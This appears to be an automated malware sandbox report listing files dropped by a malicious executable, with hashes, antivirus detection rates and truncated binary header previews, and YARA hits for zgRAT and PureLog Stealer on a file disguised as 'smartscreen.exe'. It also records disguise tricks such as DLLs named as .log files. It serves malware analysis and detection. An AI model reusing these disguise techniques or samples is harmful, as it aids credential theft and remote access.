                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):39936
                                                                                                Entropy (8bit):5.629584586954759
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\bmmUfKkQ.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):39936
                                                                                                Entropy (8bit):5.629584586954759
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\fTGLCVSM.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32256
                                                                                                Entropy (8bit):5.631194486392901
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\fcdLmHlJ.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):22016
                                                                                                Entropy (8bit):5.41854385721431
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\gUHludjC.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\hILtgrfA.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\nGlBWAAq.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):23552
                                                                                                Entropy (8bit):5.529329139831718
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\qDaBeGpk.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):9728
                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                                                C:\Users\user\Desktop\rreJQTki.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                C:\Users\user\Desktop\sBnSdgqk.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):85504
                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                C:\Users\user\Desktop\stDzyxQe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):5.6808219961645605
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\ttRrlCpd.log

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):5.6808219961645605
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\uDZAyPvf.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.492504448438552
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\wjuqGuQY.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\ylgZbdUT.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                C:\Users\user\Desktop\yuQrGMvY.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                C:\Users\user\Downloads\2afe4ed40d5a86

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):521
                                                                                                Entropy (8bit):5.891189885055267
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:K5X4bXkBYJ1n7P/N5PX3OB3f/TaTFYNejCf8SfSiiJfmVC/:K5IPJ1n7t5P83zaTUfxf/iJ/
                                                                                                MD5:008474D0073619C6BD8772ECB4C7537A
                                                                                                SHA1:2711BF81C4CE760C780BF63C3B3FA3E0F6B0A280
                                                                                                SHA-256:DD6B0EB99F7D1C89062E7314218C106A6294BC3F1ADD8F966FCFAA6EC4FB360A
                                                                                                SHA-512:E399DF4A79D9D2C3D6BBC567E92E1AB09242FE581A9AA05C0FF79258C016D627DEAC5857454B951DE8071C30FF6E8C63D70912245188D497B048DC45F011663A
                                                                                                Malicious:false
                                                                                                Preview:F0VdSs2vL81haY67DjG9HX3CHJ3V7fulV0pH5S9V1w7gCWFlH7s03UYr7TWIzhypOQMktyBujuHUaW9uDSN9x3rAb7Km60gU7SRvKf1S58QINDRkTlFgUz2VjLJwoZytOxXHEOkia4DzmixXpjSUv9AIa6M9VFngKh4ZqKfFBgGZvCsAXvGFGd8OxOrIBkMURhoEoYrfENSO3kXXOLmj9iZqjplbcXDbTvINYnW8ElA3LtVM1T408mVsI8f8xPCrK14HcJ9kznfYhgfzUYjIdMcqaZFZIXLyiTsUyNtsUTBVH7KmdqnYp3N7YOrDDjbbcqzOxLAHo1yJLHjdPd6ctwJoFv5kfqou2j2aH5ySpgtyFEvRoOxkn9rphLIBPZm7MDRlOIVToowNCUjA9o6R3DH22N36xxCP4wlBxKCg2d68MenMlHCldUEJ5YtBOZg1lhTQthNzmZYZHJqXjqUpubwjrcGZaARc7FXpLWdE4N9D6oBwrVbhF0GKvtiQbxYlI5cCvBMNN

                                                                                                C:\Users\user\Downloads\smartscreen.exe

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
